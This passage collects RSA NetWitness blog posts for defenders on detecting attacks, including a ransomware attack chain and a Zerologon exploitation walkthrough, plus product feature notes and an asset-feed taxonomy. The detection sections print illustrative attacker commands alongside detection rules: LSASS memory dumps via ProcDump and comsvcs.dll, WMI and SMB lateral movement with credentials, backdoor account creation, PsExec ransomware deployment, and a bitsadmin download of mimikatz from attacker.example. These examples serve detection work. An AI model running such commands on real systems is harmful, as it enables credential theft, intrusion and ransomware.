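      "urlFormat": "https://exploits.shodan.io/?q={0}",
      "id": "ShodanExploit",
      "moduleClasses": ["UAP.investigation.navigate.view.NavigationPanel"],
      "openInNewTab": "true"
    }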

Once you hit save, either reload a tab that has Investigate open or open a new one. Any value in the alert meta will have a right-click option for "Shodan Exploit" going forward. It's a quick function that saves time when trying to figure out which CVE is which. If you really don't want to use CVE names, that is fine too; use a name associated with the exploit. In this instance, I could use "Cisco Smart Install", and Shodan will query various resources (e.g., ExploitDB) and provide me links. Use of the CVE name just provides an immediate result without having to look through search results.

 

Packet Bonus

In the previous section, we went over adding a Shodan right-click function to the alert meta, but what if you only have packets? Surely you can extend that too. You'd be correct. One common extension of functionality that I like is adding Censys and/or Shodan to the IP-related meta (ip.dst, ip.src, ip.addr). There are more tools we can add, but we'll cover those in a later post. We're going to move away from the attack for this section because I did not make my vulnerable switch internet-facing for obvious reasons (I did not want to get pwned by a stranger/bot). I'll show the Censys integration on an external IP, as most tools will not be able to provide data on my internal LAN. Here is a use case though: you want to quickly determine how many of your externally facing switches could potentially be vulnerable to the attack we discussed above. Wouldn't it be nice to look at the IP meta in NetWitness, right-click the externally facing switch IP, and instantly get a printout of which ports are open? Specifically, whether port 4786 is open. No API key, nmap, or vulnerability report required.

I redacted some information from the results, but you can see what is important: if a vulnerable switch had been queried, we would see 4786 as open. Setting this up is easier than Shodan, as you won't need an API key for the base lookup functionality. Following the same steps as above, create another Context Menu Action.

 

Afterthoughts

Here is a high-level overview of what this post covered:

  • Switch gets pwned
  • We review hunting basics
  • We find said pwning during routine hunt
    • We have notified operations and hopefully a change order is in the works to remediate this threat
    • Until remediation is done, we have to monitor for further pwning and identify vulnerable devices
  • We can make monitoring more effective with the alerting functionality within Respond
    • ESA rule building
  • We can extend the NetWitness out-of-box functionality with third-party integrations such as Shodan and Censys

Everything we have gone over can be expanded on further in some shape or form. Both Censys and Shodan have more functionality than what was discussed here; I chose these two as they are often not utilized by a blue team. Part of being an analyst is understanding the organization's infrastructure. Another part is to think outside the box and look at the infrastructure from an attacker's point of view. These two tools are often used during the reconnaissance phase of an attack, and it is beneficial for a blue team to use them as well. Shodan is often used to find vulnerable devices, but we were able to re-purpose it to make our vulnerability lookup more efficient. The Censys lookup provides us with a quick way to see what devices may be vulnerable; the information is the same as what the attacker sees. I hope you found this post interesting and learned something new. Anything involving attacks is always a personal interest of mine, and I enjoy providing my customers (and you, the reader) some information that I have learned over time.

 

We will be discussing this process on the December 16, 2020 webinar:

The Hunt for RCE (Packets)


 

 

Introduction

Ransomware is something that’s haunted businesses for well over a decade, and now more than ever, detection for these attacks is something that should be prioritized by organizations. While reports have noted a slight decline in the number of ransomware attacks (Sophos 2020), they have now become highly targeted, more sophisticated, and deadly due to the value of the assets being encrypted.

 

How is Ransomware Deployed?

For ransomware to be as effective as possible, it must infect as many endpoints as possible. This means that ransomware is commonly deployed using techniques that allow for quick and easy distribution. Deployment methods can include the following:

 

  • Microsoft SysInternals PsExec Utility
  • Group Policy Objects (GPOs)
  • System Center Configuration Manager (SCCM)

 

If the attacker has reached the stage where they are ready to distribute the ransomware, your detection of it will most likely occur once it starts encrypting your files, which is far too late. Prior to the deployment of the ransomware, the attacker must infiltrate the network, set up backdoors, harvest credentials, move laterally, and exfiltrate data - the attacker has to make a lot of noise to reach their end goal, and it is at these key points that defenders need to detect the attack. The dwell time from the first signs of malicious activity to the deployment of ransomware can be as little as a few hours, so quick detection to prevent a successful attack is a must. The following figure shows an example flow of how a ransomware attack may play out:

 

 

Let's run through this and see how we can detect this with NetWitness.

 

Credential Harvesting

For an attacker to move laterally, they are going to need some credentials. These are typically obtained by dumping the memory of LSASS and using Mimikatz to extract the cleartext credentials from the dump. There are several methods an attacker can use to dump the memory of LSASS:

 

  • Microsoft Sysinternals ProcDump
  • Using the MiniDump function from comsvcs.dll
  • Custom applications (such as Dumpert)

 

Understanding these methods and how they manifest themselves in NetWitness is important for defenders, so they can quickly identify if these actions are occurring on their network.

 

ProcDump

ProcDump is a command line utility and, as such, will typically be executed via cmd.exe. The corresponding events would look similar to the below, where cmd.exe launches the ProcDump binary with the command line arguments to dump LSASS memory and save it as a minidump:
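A typical invocation looks like this (the output path is illustrative):

    procdump.exe -accepteula -ma lsass.exe C:\PerfLogs\lsass.dmp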

 

We then see the ProcDump binary open lsass.exe in order to dump the memory:

 

This minidump would typically be exfiltrated from the network so the attacker can run Mimikatz against it to extract credentials. They do this activity offline as introducing Mimikatz into the network would most likely trigger antivirus and other detections. You should definitely monitor your AV logs for alerts of this type.

 

The activity above could be detected by adding the following application rule to your Endpoint Decoder(s):

Name                     Logic
procdump lsass dump      param.src contains '-ma lsass' || param.dst contains '-ma lsass'
sysinternals tool usage  param.src contains '-accepteula' || param.dst contains '-accepteula'

 

Microsoft Sysinternal tools could also be detected by utilising the following query, file.vendor = 'sysinternals - www.sysinternals.com':

 

As a defender, it would then be possible to identify malicious intent by analyzing the locations and names of the binaries. For example, the screenshot below shows that the Sysinternals tool named pd.exe exists in the C:\PerfLogs\ directory; this should stand out as anomalous and be triaged:

 

comsvcs.dll

This method has been around for quite some time but is seldom observed being utilized by attackers; however, it is a method to dump LSASS memory that should be monitored all the same. An example of how this may look is shown below, where we see a PowerShell command using rundll32.exe to invoke the MiniDump function from comsvcs.dll and create a minidump of LSASS:
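A representative form of this command (the output path is illustrative; the PID of lsass.exe is resolved inline):

    powershell -c "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\PerfLogs\lsass.dmp full"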

 

We then see rundll32.exe open lsass.exe in order to dump the memory:

 

The activity above could be detected by adding the following application rule to your Endpoint Decoder(s):

Name                    Logic
comsvcs.dll lsass dump  param.src contains 'comsvcs.dll MiniDump' || param.dst contains 'comsvcs.dll MiniDump'

 

Custom Applications

Custom applications can be made to dump the memory of LSASS using direct system calls and API unhooking; an example of a tool that does just that is Dumpert. Tools such as this would commonly be executed via cmd.exe. From the below, we can see that cmd.exe was used to run Outflank-Dumpert.exe, which subsequently opens lsass.exe to dump the memory:

 

Activity from unsigned executables opening LSASS would be flagged by the meta value shown in the following figure. As a defender, all binaries flagged by this meta value should be investigated to confirm if they are legitimate or malicious:

 

If the LSASS minidump is transferred across the network via a cleartext protocol, and you have pushed the fingerprint_minidump Lua parser to your Packet Decoder(s), the following meta value will be created, which is another great starting point for an investigation:

 

Lateral Movement

Once the attacker has credentials, they can begin to move laterally to endpoints in the network. An attacker has a number of options for lateral movement; typically they use:

 

  • Remote Desktop Protocol (RDP)
  • Windows Management Instrumentation (WMI)
  • Server Message Block (SMB)

 

While all of the above are used legitimately within an environment, it is important for defenders to understand how and where they are utilized in order to identify anomalous usage.

 

RDP

RDP is a great way for attackers to move laterally; it provides an interactive graphical view of the endpoint they connect to and can easily blend in with normal day-to-day operations, allowing it to go unnoticed by defenders. Typically, RDP logs are examined once evidence of compromise is found. The attacker will be utilising one or more users, and this information can then be used as a pivot point to identify lateral activity:

In order for the RDP event logs to be parsed as shown above, I added two dynamic log parser rules: Log Parser Customize: Log Parser Rules Tab 


The best log for monitoring RDP activity is the Microsoft-Windows-TerminalServices-LocalSessionManager/Operational event log; an event ID of 21 indicates a successful RDP connection. A great read to get a better handle on the event IDs related to RDP can be found here: Windows RDP-Related Event Logs: Identification, Tracking, and Investigation | Ponder The Bits.

 

WMI

Moving laterally to endpoints using WMI is a common technique adopted by attackers. Typically, usage of a tool named WMIExec is favoured. The following screenshot shows an example of how this tool's usage looks in NetWitness Endpoint. From the below, we can see the WMI provider service, WmiPrvSE.exe, execute cmd.exe and pass the parameters along with it:
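For context, an Impacket wmiexec session is typically launched like this (target, credentials, and command are illustrative):

    wmiexec.py CORP/jsmith:Password123@192.168.10.50 whoami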

 

Adding the following application rules to your Endpoint Decoder(s) would assist with detecting potentially malicious WMI usage:

Name     Logic
wmiexec  param.dst contains '127.0.0.1\\admin$\\__1'

 

The NetWitness Endpoint Decoder also comes with out of the box content to detect potentially malicious WMI usage:

 

Pivoting on these meta values is a great way to detect possible attacker lateral movement. As a defender, you would want to identify any atypical commands associated with the WMIC activity; an example of this is shown below, whereby the attacker could use WMI to remotely execute commands on an endpoint using "process call create":

 

Remote WMI activity is also flagged in NetWitness Packets with the meta value remote wmi activity. When process call create is utilised (CAR-2016-03-002: Create Remote Process via WMIC | MITRE Cyber Analytics Repository), the execmethod meta value will be populated under the action meta key. Identifying endpoints where this is taking place but typically does not is another great starting point for identifying potentially malicious WMI usage:

 

SMB

Lateral movement via SMB is typically performed with the net use command, which allows attackers to access a shared resource on a remote computer. The favoured resources are typically the administrative shares, commonly C$, ADMIN$, and D$. To identify whether this type of activity is occurring in your environment, keep an eye out for the following meta values:

 

A sample of the net use command to mount an administrative share is shown below:
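For reference, such a command takes this form (host and credentials are illustrative):

    net use \\192.168.10.254\C$ /user:CORP\jsmith Password123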

 

As a defender, you would want to pivot on these events and see which endpoints this activity is occurring on; from there you can perform timeline analysis on the endpoint to see what other activity took place around that time.

 

 

Backdoors

Once an attacker has breached a network they will need to maintain persistence. There are two primary ways that an attacker will do this:

 

  • Deploy a web shell to a public facing server
  • Deploy a Trojan to beacon back to a C2 server

 

A common method to detect C2s is via proactive hunting, which is something we have discussed in depth on many occasions as part of the Profiling Attackers Series. We highly recommend reading through those posts to grasp C2 and web shell detection, as they have been covered in depth across a number of posts.

 

Another great resource for identifying endpoints that are potentially infected with web shells or Trojans is the Microsoft-Windows-Windows Defender/Operational event log. Antivirus events are often overlooked but can be a great indicator of potential compromise, as shown below, where Defender identified two web shells in the C:\PerfLogs\ directory:

 

Account Creation

Attackers may choose to create an account in order to push their ransomware or to laterally move. A common way for an attacker to create an account is with the net command. If the following meta value appears, it should be investigated to confirm if the user account creation was legitimate or not:

Pivoting on this meta value gives us some context as to what user was created and how. From the below, we can see that lsass.exe executed net.exe to create an account named helpdesk - this is indicative behaviour of the EternalBlue exploit:

 

If a user was added via the command line, it would look like the following. This is not to say that such an addition is legitimate behaviour, but it demonstrates how a normal execution of net.exe would look:
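Representative commands (account name and password are illustrative):

    net user helpdesk Password123 /add
    net localgroup administrators helpdesk /add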

 

For both of these events, the defender should perform analysis on the endpoint(s) in question, including timeline analysis, to look for further anomalous behaviour.

 

Some additional useful application rules that could be deployed to detect anomalous behaviour by LSASS:

Name                    Logic
lsass writes exe        filename.src = 'lsass.exe' && action = 'writetoexecutable'
lsass creates process   filename.src = 'lsass.exe' && action = 'createprocess'

 

From the account creation perspective, the Security event log would record a 4720 event ID along with information about the user that was created:

 

As a defender, you could pivot on reference.id = '4720' to analyse what user accounts were being created and where.

 

Ransomware Deployment

Ransomware can be deployed via a number of methods. The one we will cover here is deployment via PsExec. This is a common choice for attackers as it is a legitimate Microsoft tool that can be easily scripted to copy and execute files. Based on the way PsExec works, we can easily spot its activity from the following meta value:

 

Drilling into these events, we can see that PsExec.exe was used to connect to a remote endpoint, transfer a binary, and execute it:
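
Such usage generally follows this pattern (hypothetical target, credentials, and binary); the -c switch copies the specified program to the remote system for execution:

psexec.exe \\192.168.1.50 -u CORP\Administrator -p P@ssw0rd -c ransom.exe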

 

A useful application rule to further detect PsExec usage could be:

Name           Logic
psexec usage   filename.dst = 'psexesvc.exe'

 

There are many clones of PsExec that work in a very similar fashion; the following application rules should be added to help identify their usage within your environment:

Name           Logic
remcom usage   filename.dst = 'remcomsvc.exe'
csexec usage   filename.dst = 'csexecsvc.exe'
paexec usage   filename.dst begins 'paexec'

 

From a Packets perspective, PsExec execution would be flagged under the Indicators of Compromise meta key. As a defender, you would then need to determine whether the PsExec activity is legitimate or not:

 

From a log perspective, the System event log records an event ID of 7045 (service creation) when PsExec is being used, as shown below:

 

This is because PsExec and similar tools utilise the Service Control Manager (SCM) in order to function. For a better understanding of PsExec and how it works, please refer to the following URL: https://www.contextis.com/de/blog/lateral-movement-a-deep-look-into-psexec.

 

 

Conclusion

What has been outlined above is merely an example of how a ransomware attack may unfold. There are of course a myriad of tactics, techniques, and procedures (TTPs) in an attacker's arsenal that have not been outlined within this blog post, but this hopefully gives you a good starting point for using NetWitness to identify anomalous behaviours and prevent successful attacks. The further along the attack is in this chain, the higher the probability the attacker will succeed; if you are at the PsExec stage, it is already a bit too late. It should also be noted that the application rules listed in this blog may generate false positives; each environment is unique, and filtering should therefore be performed on an individual basis.


RSA NetWitness Platform 11.5 has expanded support for Snort rules (also known as signatures) that can be imported into the network Decoders. Some of the newly supported rule parameters are:

  • nocase
  • byte-extract
  • byte-jump
  • threshold
  • depth
  • offset

This additional coverage enables administrators to use more commonly available detection rules that were not previously supported. The ability to use further Snort rules arms administrators with another mechanism, in addition to application rules and Lua parsers, to extend the detection of known threats. 

 

To expand your knowledge on what is and is not supported, along with a much more detailed initial setup guide, check out Decoder Snort Detection 

 

Once configured, you can investigate the threats that Snort rules have triggered by examining Events and pivoting on the metadata (sig.id, sig.name) populated from the rules themselves, or by querying threat.source = "snort rule" to find all Snort events. The Signature Identifier (sig.id) corresponds to the sid attribute in the Snort rule, while the Signature Name (sig.name) corresponds to the msg attribute of the rule options.

Snort rules found
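
As an illustration, the following hypothetical rule uses several of the newly supported parameters (nocase, offset, depth). An event triggered by this rule would populate sig.id with 1000001 and sig.name with "Example suspicious URI":

alert tcp any any -> any 80 (msg:"Example suspicious URI"; content:"/evil.php"; nocase; offset:4; depth:60; sid:1000001; rev:1;)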

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own.

Zerologon (CVE-2020-1472) is a vulnerability with a perfect CVSS score of 10/10 that is being used in the wild by attackers, allowing them to gain admin access to a Windows Domain Controller.

As more public exploits for this vulnerability are published, including support within the widely used mimikatz, even more attacks leveraging this vulnerability are expected, and it is therefore crucial to be able to detect such attempts.

 

In this post we will see how this vulnerability can be exploited using mimikatz to gain administrative access to a Windows Domain Controller running on Windows Server 2019, and how the different stages of the attack can be identified by the RSA NetWitness Platform, leveraging Logs, Network and Endpoint data. This will include exploiting the Zerologon vulnerability, followed by the creation of golden tickets, and finally gaining admin access to the domain controller via a pass-the-hash attack.

  

We will assume that the attacker already has an initial foothold on one of the internal workstations, and now wants to move laterally to the domain controller.

 

 

Step 1

Attacker

The attacker downloads “mimikatz” on the compromised system using the “bitsadmin” command.
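
A bitsadmin download of this kind typically looks like the following (hypothetical attacker URL and local path):

bitsadmin /transfer myDownloadJob /download /priority normal http://attacker.example/mimikatz.exe C:\Users\Public\mimikatz.exe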

 

 

RSA NetWitness Endpoint

The executed command is detected by RSA NetWitness Endpoint and tagged as remote file copy using BITS. The exact target parameters are also provided, allowing us to see where the file was downloaded from (identifying the attacker’s server) as well as the location of the downloaded file. In addition, as mimikatz is a known malicious file, we are able to tag the event accordingly.

 

 

 

RSA NetWitness Network

The resulting network session is captured by RSA NetWitness Network, identifying the client application as Microsoft BITS as well as the downloaded file (mimikatz.exe). If needed, the session can be reconstructed to extract the file for further forensics.

 

 

 

 

 

Step 2

Attacker

The attacker launches mimikatz, and tests whether the domain controller is vulnerable to the Zerologon vulnerability.

 

As the domain controller is vulnerable, the attacker executes the exploit.

 

 

RSA NetWitness Network

We know that the exploit starts with a “NetrServerReqChallenge” and spoofs the “NetrServerAuthenticate” with 8x ‘0’s (as seen in the previous screenshot). We also know that it takes an average of 256 such attempts for the attack to be successful.

This consequently leads to the following:

  • We expect to see “NetrServerReqChallenge” and “NetrServerAuthenticate”
  • Due to the large number of attempts, we expect the size of the session to be larger than other similar connections
  • We expect the session to contain a large number of ‘0’s

 

In fact, by looking at the captured network session, we can see these indicators tagged by RSA NetWitness.

 

As seen in the above screenshot:

  • The session is related to netlogon (as the vulnerability targets this service)
  • We can see both “NetrServerReqChallenge” and “NetrServerAuthenticate” within the session
  • The most common byte (MCB.REQ) is “0”
  • The size of the payload is around 200KB
  • As we also have the RSA NetWitness Endpoint agent installed on the workstation, we can link the captured network session to the process that generated this connection, in this case “mimikatz.exe”

 

Using this information, the use of this exploit could be identified with the following Application Rule:

service=135 && filename='netlogon' && action begins 'NetrServerAuthenticate' && action='NetrServerReqChallenge' && mcb.req=0 && size>40000

 

 

RSA NetWitness Logs

A successful attack would lead to the domain controller’s password being changed. This can be identified within the Windows Logs based on the following criteria:

  • Event ID: 4742 (A computer account was changed)
  • Source User: Anonymous logon
  • Destination User: ends with “$” sign
  • Hostname: specify your domain controllers

 

 

 

The following Application Rule / Query could be used for this detection:

device.type='windows' && reference.id='4742' && user.dst ends '$' && user.src='anonymous logon'

 

 

 

 

 

Step 3

Attacker

Once the attacker has successfully exploited the domain controller, he has access to it with replication rights. He can now use the “dcsync” feature of mimikatz to mimic the behavior of a domain controller and request the replication of specific users to get their password hashes. This can be done to get the password hash of the Administrator account, as seen in the below screenshot.

 

 

 

RSA NetWitness Network

User replication is requested using the “GetNCChanges” function, which results in the domain controller providing the account hashes. This behavior can be seen in the captured network traffic.

 

 

This behavior should be monitored and alerted on when initiated from an IP or subnet not expected to perform domain replication.

 

The following is a rule that can identify this behavior; it should be fine-tuned to exclude IP addresses that are expected to exhibit it:

 

action = 'drsgetncchanges' && ip.src != <list of approved IP addresses>

 

 

RSA NetWitness Logs

This would also generate Windows logs with event ID 4662; however, by default this log does not provide enough granularity to avoid a large number of false positives, and it is therefore not recommended as a standalone detection mechanism.
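
For completeness, a query sketch for surfacing these events would be the following; as noted, it should be combined with other indicators rather than relied upon on its own:

device.type='windows' && reference.id='4662'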

 

 

 

 

 

Step 4

Attacker

The attacker then gets a golden ticket with a validity of 10 years for the Administrator account.

 

He is then able to use the ticket in a pass-the-hash attack.

 

He is now able to get shell access to the domain controller without the need for authentication, and executes a couple of commands to confirm he is connected to the Domain Controller (hostname, whoami ...).

 

 

 

RSA NetWitness Logs

The attacker gained shell access by using PsExec. This leads to the creation of a service named “psexesvc” on the domain controller, which can be detected with Windows Logs and is tagged as a pass-the-hash attack by RSA NetWitness, as seen below.

 

 

RSA NetWitness Network

Leveraging network data can uncover more details.

As seen in the below screenshot, we can identify:

  • The use of the “Administrator” account to login over SMB
  • The use of Windows admin shares
  • The transfer of an executable within one of the sessions (psexec)
  • The creation of a service (psexesvc)

 

 

 

RSA NetWitness Endpoint

The initial execution of “cmd.exe” by PsExec on the Domain Controller to gain the shell access can easily be identified by RSA NetWitness Endpoint.

 

Any other command executed by the attacker after gaining shell access would also be identified and logged by RSA NetWitness Endpoint, with the ability to track which commands have been executed and by which processes they were launched, providing a full picture of how and what the attacker is doing on the domain controller.

 

 

 

Conclusion

When dealing with such attacks and breaches, which often blend in with normal noise and behaviors, it becomes evident that a rich data set combining Logs, Network, and Endpoint is critical both to detect the breach and to identify its full scope from start to end, for each step taken by the attacker.

Having visibility over East/West network traffic with rich metadata also brings significant value compared to relying on logs alone to detect and investigate such an attack efficiently. With the release of RSA NetWitness Platform v11.5, it is now possible to set up policies defining for which network traffic to keep or drop the full payload in addition to the metadata, allowing east/west network capture to be performed in a more efficient way.

RSA NetWitness has supported Structured Threat Information eXpression (STIX™) for quite some time, as it is the industry standard for open-source cyber threat intelligence.

 

 

In NetWitness v11.5 we take the power of threat intelligence coming from STIX to the next level. When in the Investigate or Respond views, you will now see the context of the intel delivered by STIX right there next to the meta, like this:

 

To achieve this, NetWitness Platform has enhanced the existing STIX integration to improve its threat detection capabilities, helping you detect and respond to attacks in a timely manner. Now, when an analyst investigates threat intelligence information retrieved from a STIX data source, the context for each indicator is displayed. The context information includes viewing the adversary and attack details directly from Context Hub, in both the Investigate and Respond views.

 

Note that for the analyst to use this capability, an administrator needs to configure the STIX data sources to retrieve the threat intelligence data from the specified STIX source as below.

 

 

  1. Add & Configure STIX/TAXII as a 'Data Source' (note that you can add a TAXII server/REST server/STIX file): 
  2. Create Feeds: Set up a STIX feed from the Custom Feeds section. Note that you can now see all the existing STIX Data Sources (as added in the previous step) to create feeds out of them. See Decoder: Create a STIX Custom Feed  for more details.
  3. Context Lookup Summary
  4. Context Lookup Details:

Here are the links to detailed documentation around STIX: 

 

Check it out and let us know what you think!

 

We strongly believe in the power of feedback! Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

As of RSA NetWitness 11.5, configuring what network traffic your Decoders collect, and to what degree they collect it, has become much easier. Administrators can now define a collection policy containing rules for many network protocols and choose whether to collect only metadata, collect all data (metadata and packets), or drop all data.

 

NW 11.5 Selective Collection Policy Creation

 

This is made simpler by out-of-the-box (OOTB) policies that cover most typical situations. These can also be cloned and turned into a custom policy that fits your environment best. 

 

NW 11.5 Initial Selective Collection Policies

 

The policies are managed from a new central location that has the ability to publish these policies to multiple network Decoders at once. This allows an administrator to configure one collection policy for DMZ traffic and distribute it to all the DMZ Decoders, while simultaneously using a separate policy for egress traffic distributed to all the egress Decoders.

 

NW 11.5 Selective Collection Policy Status

 

An administrator can view which policies are published, the Decoders they have been applied to, when the last update was made and by whom. The policies can also be created in draft form (unpublished) and not distributed to Decoders until a maintenance window is available.

 

Initially this capability focuses on network collection, but the long-term plan is to continue adding types of configurations and content administered through this centralized management approach. Please reference the RSA NetWitness Platform 11.5 documentation for further details at Decoder: (Optional) Configure Selective Network Data Collection 

 

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

RSA NetWitness 11.5 introduces the ability to interactively filter events using the metadata associated with all the events. This is seen as a new Filter button inside the Event screen that opens the Filter Events panel.

 

NW 11.5 Event Filter Button

 

This new capability functions in two modes.

 

NW 11.5 Event Filter Panel

 

The first presents a familiar search experience for analysts of all skill levels, as many websites have a similar layout where filters (attributes or categories of the data) sit on the left side of the page and the matching results display on the right. As an example, in the below image, clicking the metadata (#1) in this integrated panel automatically builds the query (#2) and retrieves the resulting table (#3) of matching events.

 

NW 11.5 Event Filter Interactive Workflow

 

As analysts use this, it helps them build an understanding of the metadata associated with the events and how to use it to structure a query.

 

NW 11.5 Full Screen Filter Events Panel

 

The second mode allows the panel to extend full screen, giving more real estate to show more metadata at once. This mode may seem very familiar to those who have used Navigate previously. As metadata values are clicked, they are added as filters to the query bar and a new filter list is generated based on the filtered events. What it does not do is execute the query to retrieve the resulting table of events. This allows the analyst to hunt through the data and then, when ready to see the results, minimize (highlighted in the above image) the Filter Events panel to reveal them.

 

In both modes, the meta values associated with the meta keys can be organized by event count or event size and sorted by count or value. This allows analysts to sort descending by event count to find outliers (a small, limited number of communications, for example). The meta keys can also be shown in smaller meta groups to help analysts focus on the most specific values for certain use cases. Analysts can use query profiles to execute a predefined query, meta group, and column group, allowing them to jump right into a specific subset of data. The right-click actions that provide additional query and lookup options are also available. For a deeper dive into this capability, check out the Investigate documentation Investigate: Drill into Metadata in the Events View (Beta)  

 

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

A business what?  A Business Context Feed is a feed that provides context about systems or data present in NetWitness, to aid the analyst in understanding more about the system or data they are examining.  The Business Context Feed should answer some basic questions that always come up during analysis.

What is this system? - Web Server, Domain Controller, Proxy Server, etc...

What does it do? - Authentication, Database/Application Server, Customer Portal, etc...

Would it be considered a Critical Asset?

A classic scenario involves an IP address.  If an analyst would like to know whether an IP address of interest belongs to a Domain Controller, they would need to obtain or identify all of the IP addresses of the Domain Controllers.  Then a query must be constructed to determine if there is a match (ip.all= 10.1.22.36,10.1.22.37,10.16.4.3,10.8.48.89,... you get the idea).  Any content such as reports or alerts developed for this use case would need to carry the list of IP addresses as well.  It can get complicated very quickly once you start putting this list of IPs into content, especially when the addresses change periodically.  Creating a Business Context Feed simplifies this use case by maintaining a single feed that is centrally managed; updating the feed can even be automated in most cases.  When the feed is applied to this use case, the query is simplified from the long IP list above to a query using a custom metakey: hnl.asset.role='domain controller'.

It is not uncommon for an organization to create around a dozen custom metakeys in NetWitness for their own use, to provide additional context for the data that is collected.  But not everyone takes the time to create a taxonomy document that sets the standard for how the custom content will be defined and populated, providing consistency for other content developed around it.  Frankly, it is not advised to comingle custom meta values with the meta values that NetWitness creates natively.  This can create confusion about what the values "are" versus what they "should be", and can adversely affect other content that uses these standard keys.  There are also reserved metakeys where custom values do not belong; these can be identified in the Unified Data Model (UDM) as "Reserved" in the "Meta Class" column or in the "Notes" column (use "ctrl+f" in the browser).

When creating custom content it is important to set standards on how the content is created, including naming conventions, spelling, formatting, and values.  This practice provides the consistency necessary for stable content development and performance.  Another common issue is that custom content becomes knowledge exclusive to the author, which affects the time it takes to bring new people up to speed.  Time is a factor too: undocumented knowledge goes stale, and even the author often cannot recall the logic behind the naming, purpose, or values.  The taxonomy document takes this burden off the content author and provides a reference for all parties involved in creating, updating, and consuming the content.  Below is an example use case of using the taxonomy to create custom metakeys and content to identify critical assets.

 

Creating Custom Metakeys - Things to Know

Name Length

You are limited to 16 characters (including the "." dot delimiters); use lowercase only for the name and values. For example, "hnl.asset.crit" comes to 14 characters, comfortably within the limit.

 

Allowed Characters

Only alphanumeric characters are allowed, except for the "." delimiter.

 

Name Construction

Metakey names should follow the Unified Data Model (UDM) "3 Logical Parts" convention and should not conflict with any current RSA keys.


Metakey concept image

Value Format

You must decide what type of value your metakey will store, and define it in the appropriate custom index files if needed. The most commonly used formats are "Text" and "Integer"; other formats exist, but these two cover most cases.

 

Multivalued Field

You will have to properly identify whether or not your metakey may contain multiple values in the same session.  This is declared in the Concentrator custom index files by setting singleton="true" on keys that hold a single value.  The reason for this is so that ESA can automatically identify the field as either a multivalued field (array) or a single-valued field.

 

Example Use Case:  Creating Critical Asset Metakeys

Concept

The concept is the least specific part of the metakey name, typically used to group the metakeys, or in this case to clearly distinguish the custom metakeys from the standard metakeys.  The concept for these asset metakeys will be an abbreviation of my "Homenet Lab"; it is not uncommon to use an abbreviated company name here.  I will use "hnl" in this case.

 

Context

The context is more specific and will typically define the "classification" of the key.  A context name of "asset" will be used here, as these keys are for identifying the critical assets.

 

Sub-Context 

The sub-context is the most specific part; the sub-context values used here are shown below:

Description   Sub-Context Abbreviation
Criticality   crit
Category      cat
Role          role
Hostname      host
Date          date
Location      loc

 

General Description of the Metakeys

The table below contains the metakey names fully assembled with the "concept.context.sub-context" values applied, showing a general description of the custom metakeys.

Metakey Name     Description
hnl.asset.crit   Numeric "Criticality" rating of the asset
hnl.asset.cat    "Category" of the asset
hnl.asset.role   "Role" of the asset
hnl.asset.host   "Hostname" of the asset
hnl.asset.date   "Date" the asset was added to the feed
hnl.asset.loc    "Location" of the asset

 

Metakey Value Format

Define whether this metakey value will be text or an integer.

Metakey          Value Format   Store Multiple Values
hnl.asset.crit   UInt8          No
hnl.asset.cat    Text           Yes
hnl.asset.role   Text           Yes
hnl.asset.host   Text           No
hnl.asset.date   UInt32         No
hnl.asset.loc    Text           No

 

Metakey Values

hnl.asset.crit

This metakey identifies the criticality of the system.  The table below lists the possible values and describes the values to use in the metakey.

Metakey Value   Description
1               Extremely Critical
2               Highly Critical
3               Moderately Critical
4               Low


hnl.asset.cat

This metakey identifies the category of the system.  The table below lists the possible values and describes the values to use in this metakey.  Note the values are always lowercase.

Metakey Value    Description
authentication   Systems that provide authentication services, like domain controllers, LDAP servers, RADIUS, SecurID, TACACS, etc.
firewall         Systems that provide firewall services
scanner          Systems that perform scanning activities, like a port/vulnerability scanner or pen test
network          Network infrastructure

 

hnl.asset.role

This metakey identifies the role of the system.  The table below lists the possible values grouped by category along with the descriptions of the values to use in this metakey.  Note the values are always lowercase.

Category         Description                                Value
authentication   Microsoft Active Directory                 domain controller
authentication   RADIUS Server                              radius server
authentication   SecurID Server                             securid server
firewall         Firewall operating in the ecommerce DMZ    ecommerce dmz
firewall         Internal firewall for secure hosting       secure hosting
firewall         Internet Perimeter Firewall                internet perimeter
scanner          Vulnerability Scanner                      vulnerability
scanner          Penetration testing                        pentest
network          Core network router                        core router
network          Core network switch                        core switch

 

hnl.asset.host

This metakey contains the short hostname of the asset, in lowercase.

 

hnl.asset.date

This metakey contains the numeric date the system was added to the feed, in YYYYMMDD format.  The date is used to determine the age of the entry, and also to make clear that no contextual meta was generated prior to that date.

 

hnl.asset.loc

This metakey identifies the location of the system. The table below lists the possible values and describes the values to use in this metakey. Note the values are always lowercase.

Metakey Value   Description
hqdc-01         Headquarters Data Center 1
lvdc-02         Leonardville Data Center 2
mscwdc-03       Moscow Data Center 3
raddc-04        Radium Data Center 4

 

Sample Business Context Feed Using Taxonomy

User Friendly Version:

#index           hnl.asset.crit   hnl.asset.cat    hnl.asset.role      hnl.asset.host   hnl.asset.date   hnl.asset.loc
10.0.0.1         1                firewall         perimeter           hnlhqfw-01       20200708         hqdc-01
192.168.1.1      1                firewall         secure hosting      hnlshfw-02       20200708         hqdc-01
192.168.63.100   1                authentication   domain controller   hnraddc-01       20200708         raddc-04
192.168.1.87     1                authentication   domain controller   hnlvdc-02        20200708         lvdc-02
192.168.50.100   1                authentication   domain controller   hnmscwdc-03      20200708         mscwdc-03
10.0.0.16        1                network          core switch         hnlcsw-01        20200708         hqdc-01

 

CSV File format for Feed Consumption:

#index,hnl.asset.crit,hnl.asset.cat,hnl.asset.role,hnl.asset.host,hnl.asset.date,hnl.asset.loc
10.0.0.1,1,firewall,perimeter,hnlhqfw-01,20200708,hqdc-01
192.168.1.1,1,firewall,secure hosting,hnlshfw-02,20200708,hqdc-01
192.168.63.100,1,authentication,domain controller,hnraddc-01,20200708,raddc-04
192.168.1.87,1,authentication,domain controller,hnlvdc-02,20200708,lvdc-02
